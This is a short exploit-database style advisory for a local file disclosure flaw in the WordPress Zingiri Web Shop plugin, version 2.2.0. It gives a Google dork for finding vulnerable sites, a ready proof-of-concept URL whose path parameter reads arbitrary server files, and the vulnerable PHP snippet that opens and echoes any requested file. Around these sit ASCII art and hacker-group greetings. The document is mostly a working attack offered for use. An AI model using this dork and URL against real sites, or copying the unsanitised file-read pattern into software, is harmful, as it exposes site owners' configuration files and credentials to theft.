+----------------------------------------------------------------------+
# Exploit Title: wordpress zingiri web shop plugin local file disclusure LFD
# Google Dork: inurl:wp-content/plugins/zingiri-web-shop
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Greetz: Milw0rm 1337day.com
# Software Link: http://wordpress.org/extend/plugins/zingiri-web-shop/download/
# version zingiri-web-shop.2.2.0
____ (_) ____ ___
( _ \| |( _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_| |_|
_
(_) ____ ____ ____ _____
| | / __| / __| \__ \ / ` \
| | \___ \ \___ \ / _ \_ | Y Y \
|_| |____/ |____/ (___ / |_|_| /
\/ \/
+----------------------------------------------------------------------+
[+] p0c : http://[SERVER]/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax-preview.php?path= [lfd]
[+] vulnerable code :
if(($fp = @fopen($_GET['path'], 'r'))) {
echo fread($fp, @filesize($_GET['path']));
@fclose($fp);
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
mAhna mAhna
[+] profile : www.facebook.com/TN.spl0it3r
+----------------------------------------------------------------------+